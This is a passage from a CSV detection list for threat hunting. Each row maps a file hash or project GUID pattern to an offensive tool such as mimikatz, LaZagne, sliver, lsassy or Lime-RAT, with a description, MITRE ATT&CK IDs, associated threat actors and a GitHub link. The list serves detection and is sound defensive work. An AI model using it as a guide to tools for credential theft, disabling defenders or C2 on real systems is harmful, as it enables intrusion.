T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30636" "*8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd*",".{0,1000}8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat 
Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30637" "*8aed04233ee4b33500c6af6da612bed71770628910a761c325987d24737c5c28*",".{0,1000}8aed04233ee4b33500c6af6da612bed71770628910a761c325987d24737c5c28.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","30638" "*8af3cfb3abdb8084e68290f3f14d0656b45dcb2f35e47ae1641666bc18f1f114*",".{0,1000}8af3cfb3abdb8084e68290f3f14d0656b45dcb2f35e47ae1641666bc18f1f114.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","30639" "*8af3e901ab7c19e8ad6f8d8caab23bb8ef1c9577aa4a5c5e4b43309306c4a11a*",".{0,1000}8af3e901ab7c19e8ad6f8d8caab23bb8ef1c9577aa4a5c5e4b43309306c4a11a.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","30640" "*8af4a9eec787d4d04a62fc1690acb4988bb753e430e38be4754ad24f3af0d084*",".{0,1000}8af4a9eec787d4d04a62fc1690acb4988bb753e430e38be4754ad24f3af0d084.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30641" "*8af8c2cf6d5bb1a72a9d0ac3a534ba4d68ae6188aea4fbcf93c9fa5ebde47588*",".{0,1000}8af8c2cf6d5bb1a72a9d0ac3a534ba4d68ae6188aea4fbcf93c9fa5ebde47588.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. 
Attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","30643" "*8b02540e34bb947d712daeffb713755041a7ee73f8bdb0f5a7a2fbf2d8113e1d*",".{0,1000}8b02540e34bb947d712daeffb713755041a7ee73f8bdb0f5a7a2fbf2d8113e1d.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","30645" "*8b02fcc3d2b456afebba8cf41d7540794f0af7a9a1ff2a080b89400b75b3c407*",".{0,1000}8b02fcc3d2b456afebba8cf41d7540794f0af7a9a1ff2a080b89400b75b3c407.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30646" "*8b081e47fc6d4ab5dc0483dcc7243ff66911b9e660ab8ad9296a7144e95dbd47*",".{0,1000}8b081e47fc6d4ab5dc0483dcc7243ff66911b9e660ab8ad9296a7144e95dbd47.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","30647" "*8b181b6d9004ec5341ed9adeaaf5f43ece0479da86687e7f3e70788d282df356*",".{0,1000}8b181b6d9004ec5341ed9adeaaf5f43ece0479da86687e7f3e70788d282df356.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30650" "*8b1840ee863f4ae4a930b7306feaac10201344bb6da49401b2673ffc5c9c0f51*",".{0,1000}8b1840ee863f4ae4a930b7306feaac10201344bb6da49401b2673ffc5c9c0f51.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30651" "*8b1840ee863f4ae4a930b7306feaac10201344bb6da49401b2673ffc5c9c0f51*",".{0,1000}8b1840ee863f4ae4a930b7306feaac10201344bb6da49401b2673ffc5c9c0f51.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30652" "*8b1b47c29bc124e99ea4e2d0b9d16ae4c8042b26f4592c46bcadb208dd780f76*",".{0,1000}8b1b47c29bc124e99ea4e2d0b9d16ae4c8042b26f4592c46bcadb208dd780f76.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30653" "*8b1f0a69-a930-42e3-9c13-7de0d04a4add*",".{0,1000}8b1f0a69\-a930\-42e3\-9c13\-7de0d04a4add.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","30654" 
"*8b27ef8f7cbae47922e672618e39abe7fa626c7405a67b12d7a88c1da8b06cad*",".{0,1000}8b27ef8f7cbae47922e672618e39abe7fa626c7405a67b12d7a88c1da8b06cad.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","30655" "*8b2dc1f28bf0d8eb2501759807524c08778a8c4140e3af9f16bc2829bd9fdc66*",".{0,1000}8b2dc1f28bf0d8eb2501759807524c08778a8c4140e3af9f16bc2829bd9fdc66.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","30657" "*8b30d6cf12fb57cfd41dd6a41b5f16b04642a019ae57074a4f884a8d5f97699c*",".{0,1000}8b30d6cf12fb57cfd41dd6a41b5f16b04642a019ae57074a4f884a8d5f97699c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30658" 
"*8b38b963ce6d0b7eec0647eb5f65005bf981fa462825a75fa193260f0a53a1e8*",".{0,1000}8b38b963ce6d0b7eec0647eb5f65005bf981fa462825a75fa193260f0a53a1e8.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","30659" "*8b3bf64feef51862a63baf61cae61c353c5b8a16c12f452626e14272a589cc48*",".{0,1000}8b3bf64feef51862a63baf61cae61c353c5b8a16c12f452626e14272a589cc48.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30660" "*8b3dc5f7f95e60cc22e2e41bf2c000c3ab16983493bae2427b92f984147de598*",".{0,1000}8b3dc5f7f95e60cc22e2e41bf2c000c3ab16983493bae2427b92f984147de598.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30661" "*8b3f9a3242e75005203ff26e3a5af76bb57ebce8fb29c13559b3bccfa7c4cce3*",".{0,1000}8b3f9a3242e75005203ff26e3a5af76bb57ebce8fb29c13559b3bccfa7c4cce3.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - 
T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30662" "*8b41d9f80065f1bdcef489969e314c71f6f36265f6b6b5250a90608b9f393cdb*",".{0,1000}8b41d9f80065f1bdcef489969e314c71f6f36265f6b6b5250a90608b9f393cdb.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","30664" "*8b43f966bd55fe366e37e1974cdbe61cb01618c4df5298df928de0e2599b6050*",".{0,1000}8b43f966bd55fe366e37e1974cdbe61cb01618c4df5298df928de0e2599b6050.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30665" "*8b440c386b62c525e2dfb90008c3070f481747a5b6929a4f31878429d6f34c67*",".{0,1000}8b440c386b62c525e2dfb90008c3070f481747a5b6929a4f31878429d6f34c67.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","30666" 
"*8b45bafd3a11fdf97de1819bdcfb7560f11ee1207562b1f53712a25326610b4f*",".{0,1000}8b45bafd3a11fdf97de1819bdcfb7560f11ee1207562b1f53712a25326610b4f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30667" "*8b46156114d2138894c4ab91a8d5e4509ab9c559cef6c349ba45f631d4b4245c*",".{0,1000}8b46156114d2138894c4ab91a8d5e4509ab9c559cef6c349ba45f631d4b4245c.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","30668" "*8b4cb728e2db083daf0b42a3d3e6982e161ba42f90264e6da1508800e4b4d394*",".{0,1000}8b4cb728e2db083daf0b42a3d3e6982e161ba42f90264e6da1508800e4b4d394.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","0","#filehash","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","30669" "*8b4da3fc66c36752ab032c8d57a0df7caa530d07c3e9847582ff2d792768ff12*",".{0,1000}8b4da3fc66c36752ab032c8d57a0df7caa530d07c3e9847582ff2d792768ff12.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - 
Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30671" "*8b53f3b214e31f24b635bc45651cf7004da4718cb0b8c844d27836153711da3d*",".{0,1000}8b53f3b214e31f24b635bc45651cf7004da4718cb0b8c844d27836153711da3d.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","30672" "*8b585057debe15045f4e0694e8fbd3325b7ad71ce2e20003d6637fa6e1c1e025*",".{0,1000}8b585057debe15045f4e0694e8fbd3325b7ad71ce2e20003d6637fa6e1c1e025.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30673" "*8b5b0e03d4d5becb309f86a7149dd0573f89c19bcd4f8becb7d86b17c90a6c04*",".{0,1000}8b5b0e03d4d5becb309f86a7149dd0573f89c19bcd4f8becb7d86b17c90a6c04.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","30674" "*8B605B2E-AAD2-46FB-A348-27E3AABA4C9C*",".{0,1000}8B605B2E\-AAD2\-46FB\-A348\-27E3AABA4C9C.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","30675" "*8b6d83c919ad123d4b27f3404604e99eeba9196cf81f3210a65d8ae1b89465a6*",".{0,1000}8b6d83c919ad123d4b27f3404604e99eeba9196cf81f3210a65d8ae1b89465a6.{0,1000}","offensive_tool_keyword","Termite","Termite rootkit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","30677" "*8B723CB2-017A-4CB6-B3E6-C26E9F1F8B3C*",".{0,1000}8B723CB2\-017A\-4CB6\-B3E6\-C26E9F1F8B3C.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30678" "*8B73C3EC-D0C4-4E0D-843A-67C81283EC5F*",".{0,1000}8B73C3EC\-D0C4\-4E0D\-843A\-67C81283EC5F.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","30679" "*8b7c731bf78f3cf4972a8197d3ae0d4b27041e4b52ff7e6451b826e2a77fb06f*",".{0,1000}8b7c731bf78f3cf4972a8197d3ae0d4b27041e4b52ff7e6451b826e2a77fb06f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30680" "*8b86dff9da37df4824039ae6da4e3ad9b27b2c25805990ede69b2e036dc30996*",".{0,1000}8b86dff9da37df4824039ae6da4e3ad9b27b2c25805990ede69b2e036dc30996.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","30682" "*8b88db25c32e31d7b139b916e2df8aa3662b93a072077c26f3319a0978cb05e4*",".{0,1000}8b88db25c32e31d7b139b916e2df8aa3662b93a072077c26f3319a0978cb05e4.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","30684" "*8b9666a09ac189375f18de24c713e0571a4bf50a9e58489d71f19378b822a623*",".{0,1000}8b9666a09ac189375f18de24c713e0571a4bf50a9e58489d71f19378b822a623.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30686" "*8b997891257e94a5dca93dd4b7341dc3a991d5fcd4b5730110abfa6c258d30df*",".{0,1000}8b997891257e94a5dca93dd4b7341dc3a991d5fcd4b5730110abfa6c258d30df.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30688" "*8ba095144dbfff485b4f4db04c338ef687a58306043dad87fe447f219120d1a0*",".{0,1000}8ba095144dbfff485b4f4db04c338ef687a58306043dad87fe447f219120d1a0.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","30689" "*8ba2d0dc05dc4a81e064e9bf70eb3681f661b026c7daec1433fb8dad4b9d8a1f*",".{0,1000}8ba2d0dc05dc4a81e064e9bf70eb3681f661b026c7daec1433fb8dad4b9d8a1f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30690" "*8ba79d96e4337be960e4dd1ce94a622c08391da243fee05a44d303de46f9ae93*",".{0,1000}8ba79d96e4337be960e4dd1ce94a622c08391da243fee05a44d303de46f9ae93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30691" "*8BAAEFF6-1840-4430-AA05-47F2877E3235*",".{0,1000}8BAAEFF6\-1840\-4430\-AA05\-47F2877E3235.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense 